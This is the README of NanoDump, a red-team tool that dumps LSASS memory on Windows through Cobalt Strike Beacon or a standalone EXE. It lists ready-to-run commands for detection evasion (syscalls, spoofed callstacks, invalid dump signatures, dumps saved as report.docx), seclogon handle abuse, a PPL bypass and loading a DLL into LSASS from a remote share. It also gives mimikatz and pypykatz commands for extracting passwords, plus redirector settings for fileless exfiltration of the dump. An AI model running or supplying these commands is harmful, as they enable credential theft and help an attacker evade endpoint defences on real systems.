NanoDump

A flexible tool that creates a minidump of the LSASS process.

Table of contents

1. Features
2. Usage
3. Process forking
4. Snapshot
5. Handle duplication
6. Seclogon handle leak local
7. Seclogon handle leak remote
8. Seclogon handle duplication
9. Load nanodump as an SSP
10. PPL bypass
11. WerFault
12. Spoof the callstack
13. Parameters
14. Examples
15. HTTPS redirectors

1. Features

• It uses syscalls (with SysWhispers2) for most operations.
• Syscalls are called from an ntdll address to bypass some syscall detections.
• It sets the syscall callback hook to NULL.
• Windows APIs are called using dynamic invoke.
• You can choose to download the dump without touching disk or write it to a file.
• The minidump by default has an invalid signature to avoid detection.
• It reduces the size of the dump by ignoring irrelevant DLLs. The (nano)dump tends to be arround 10 MiB in size.
• You don't need to provide the PID of LSASS.
• No calls to dbghelp or any other library are made, all the dump logic is implemented in nanodump.
• Supports process forking.
• Supports snapshots.
• Supports handle duplication.
• Supports MalSecLogon.
• Supports the PPL userland exploit.
• You can load nanodump in LSASS as a Security Support Provider (SSP).
• You can use the .exe version to run nanodump outside of Cobalt Strike :smile:.

2. Usage

Clone

git clone https://github.com/helpsystems/nanodump.git

Compile (optional)

On Linux with MinGW

make -f Makefile.mingw

On Windows with MSVC (No BOF support)

nmake -f Makefile.msvc

Import

Import the NanoDump.cna script on Cobalt Strike.

Run

Run the nanodump command in the Beacon console.

beacon> nanodump

Restore the signature

Once you downloaded the minidump, restore the invalid signature

scripts/restore_signature <dumpfile>

Get the secretz

mimikatz:
To get the secrets simply run:

mimikatz.exe "sekurlsa::minidump <dumpfile>" "sekurlsa::logonPasswords full" exit

pypykatz:
If you prefer to stay on linux, you can use the python3 port of mimikatz called pypykatz.

python3 -m pypykatz lsa minidump <dumpfie>

3. Process forking

To avoid opening a handle to LSASS with PROCESS_VM_READ, you can use the --fork parameter.
This will make nanodump create a handle to LSASS with PROCESS_CREATE_PROCESS access and then create a 'clone' of the process. This new process will then be dumped. While this will result in a process creation and deletion, it removes the need to read LSASS directly.

4. Snapshot

Similarly to the --fork option, you can use --snapshot to create a snapshot of the LSASS process.
This will make nanodump create a handle to LSASS with PROCESS_CREATE_PROCESS access and then create a snapshot of the process using PssNtCaptureSnapshot. This new process will then be dumped. The snapshot will be freed automatically upon completion.

5. Handle duplication

As opening a handle to LSASS can be detected, nanodump can instead search for existing handles to LSASS.
If one is found, it will copy it and use it to create the minidump.
Note that it is not guaranteed to find such handle.

6. Seclogon handle leak local

To avoid opening a handle to LSASS, you can use abuse the seclogon service by calling CreateProcessWithLogonW to leak an LSASS handle into the nanodump binary.
To enable this feature, use the --seclogon-leak-local parameter.
Take into account that when used from Cobalt Strike, an unsigned nanodump binary needs to be written to disk to use this feature.

7. Seclogon handle leak remote

This technique is very similar to the previous one, but instead of leaking the handle into nanodump, it is leaked into another binary and then duplicated so that nanodump can used it. Use the --seclogon-leak-remote flag to access this functionality.

8. Seclogon handle duplication

You can trick the seclogon process to open a handle to LSASS and duplicate it before it is closed, by winning a race condition using file locks. Use the --seclogon-duplicate flag to access this functionality.

9. Load nanodump as an SSP

You can load nanodump as an SSP in LSASS to avoid opening a handle. The dump will be written to disk with an invalid signature at C:\Windows\Temp\report.docx by default. Once the dump is completed, DllMain will return FALSE to make LSASS unload the nanodump DLL.
To change the dump path and signature configuration, modify the function NanoDump in entry.c and recompile.

Upload and load a nanodump DLL

If used with no parameters, an unsigned nanodump DLL will be uploaded to the Temp folder. Once the dump has been created, manually delete the DLL with the delete_file command.

beacon> load_ssp
beacon> delete_file C:\Windows\Temp\[RANDOM].dll

Load a local DLL

beacon> load_ssp c:\ssp.dll

Load a remote DLL

beacon> load_ssp \\10.10.10.10\openShare\ssp.dll

10. PPL bypass

To access this feature, use the nanodump_ppl command

beacon> nanodump_ppl -v -w C:\Windows\Temp\lsass.dmp

11. WerFault

Because the dump is not made by nanodump, it will always have a valid signature.

Silent Process Exit

To leverage the Silent Process Exit technique, use the --silent-process-exit parameter and the path there the dump should be created.

beacon> nanodump --silent-process-exit C:\Windows\Temp\

A dump of the nanodump process will also be created, similar to this:

PS C:\> dir 'C:\Windows\Temp\lsass.exe-(PID-648)-4035593\'

Directory: C:\Windows\Temp\lsass.exe-(PID-648)-4035593

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/23/2022   7:40 AM       58830409 lsass.exe-(PID-648).dmp
-a----         6/23/2022   7:40 AM        7862825 nanodump.x64.exe-(PID-3224).dmp

Shtinkering

You can also use the Shtinkering technique, which requires nanodump to run under SYSTEM.

beacon> nanodump --shtinkering

The dump will tipically be created under C:\Windows\system32\config\systemprofile\AppData\Local\CrashDumps

12. Spoof the callstack

You can open a handle to LSASS with a fake callstack, this makes the function call look a bit more legitimate.
The offsets used in this feature, are only valid for Windows 10.0.19044.1706 (21h2), in other versions, the callstack might not look as expected. You can spoof the callstack of svchost, wmi and rpc.
To access this feature, use the paramter --spoof-callstack with the values svchost, wmi or rpc.

12. Parameters

--write -w < path > (required for EXE)

Where to write the dumpfile.

• BOF: If this parameter is not provided, the dump will be downloaded in a fileless manner.
• EXE: This parameter is required given that no C2 channel exists

--valid -v

The minidump will have a valid signature.
If not entered, the signature will be invalid. Before analyzing the dump restore the signature of the dump, with:
scripts/restore_signature <dumpfile>

--fork -f

Fork LSASS and dump this new process.

--snapshot -s

Create a snapshot of LSASS and dump this new process.

--duplicate -d

Try to find an existing handle to LSASS and duplicate it.

--seclogon-leak-local -sll

Leak an LSASS handle into nanodump from the seclogon service
If used from Cobalt Strike, an unsigned binary will be written to disk

--seclogon-leak-remote -slr < binary path >

Leak an LSASS handle into the specified binary and then duplicate it.

--seclogon-duplicate -sd

Force seclogon to open a handle to LSASS and duplicate it.

--spoof-callstack -sc { svchost,wmi,rpc }

Call NtOpenProcess with a fake function callstack.

--silent-process-exit -spe < folder >

Force WerFault to dump LSASS in the specified folder via SilentProcessExit.

--shtinkering -sk

Force WerFault to dump LSASS in the specified folder via Shtinkering.

--getpid

Get PID of LSASS and leave.
This is just for convenience, nanodump does not need the PID of LSASS.

13. Examples

Read LSASS indirectly by creating a fork and write the dump to disk with an invalid signature:

beacon> nanodump --fork --write C:\lsass.dmp

Use the seclogon leak remote to leak an LSASS handle in a notepad process, duplicate that handle to get access to LSASS, then read it indirectly by creating a fork and download the dump with a valid signature:

beacon> nanodump --seclogon-leak-remote C:\Windows\notepad.exe --fork --valid

Get a handle with seclogon leak local, read LSASS indirectly by using a fork and write the dump to disk with a valid signature (a nanodump binary will be uploaded!):

beacon> nanodump --seclogon-leak-local --fork --valid --write C:\Windows\Temp\lsass.dmp

Download the dump with an invalid signature (default):

beacon> nanodump

Duplicate an existing handle and write the dump to disk with an invalid signature:

beacon> nanodump --duplicate --write C:\Windows\Temp\report.docx

Get the PID of LSASS:

beacon> nanodump --getpid

Load nanodump in LSASS as an SSP (a nanodump binary will be uploaded!):

beacon> load_ssp
beacon> delete_file C:\Windows\Temp\[RANDOM].dll

Load nanodump in LSASS as an SSP remotely:

beacon> load_ssp \\10.10.10.10\openShare\nanodump_ssp.x64.dll

Dump LSASS bypassing PPL, duplicating the handle that csrss.exe has on LSASS:

beacon> nanodump_ppl --duplicate --write C:\Windows\Temp\lsass.dmp

Trick seclogon to open a handle to LSASS and duplicate it, then download the dump with an invalid signature:

beacon> nanodump --seclogon-duplicate

Make the WerFault.exe process create a full memory dump in the Temp folder:

beacon> nanodump --werfault C:\Windows\Temp\

Open a handle to LSASS with an invalid callstack and download the minidump with an invalid signature:

beacon> nanodump --spoof-callstack svchost

Use the Shtinkering techinque:

beacon> nanodump --shtinkering

Obtain a handle using seclogon leak local and create the dump using the Shtinkering techinque:

beacon> nanodump --seclogon-leak-local --shtinkering

14. HTTPS redirectors

If you are using an HTTPS redirector (as you should), you might run into issues when downloading the dump filessly due to the size of the requests that leak the dump.
Increase the max size of requests on your web server to allow nanodump to download the dump.

NGINX

location ~ ^...$ {
    ...
    client_max_body_size 50M;
}

Apache2

<Directory "...">
    LimitRequestBody  52428800
</Directory>

Credits

• skelsec for writing minidump, which was crucial for learning the minidump file format.
• freefirex from CS-Situational-Awareness-BOF at Trustedsec for many cool tricks for BOFs
• Jackson_T for SysWhispers2
• BillDemirkapi for Process Forking
• Antonio Cocomazzi for Abusing leaked handles to dump LSASS memory and Racing for LSASS dumps
• xpn for Exploring Mimikatz - Part 2 - SSP
• Matteo Malvica for Evading WinDefender ATP credential-theft: a hit after a hit-and-miss start
• James Forshaw for Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege
• itm4n for the original PPL userland exploit implementation, PPLDump.
• Asaf Gilboa for Lsass Memory Dumps are Stealthier than Ever Before - Part 2 and the Shtinkering technique
• William Burgess for Spoofing Call Stacks To Confuse EDRs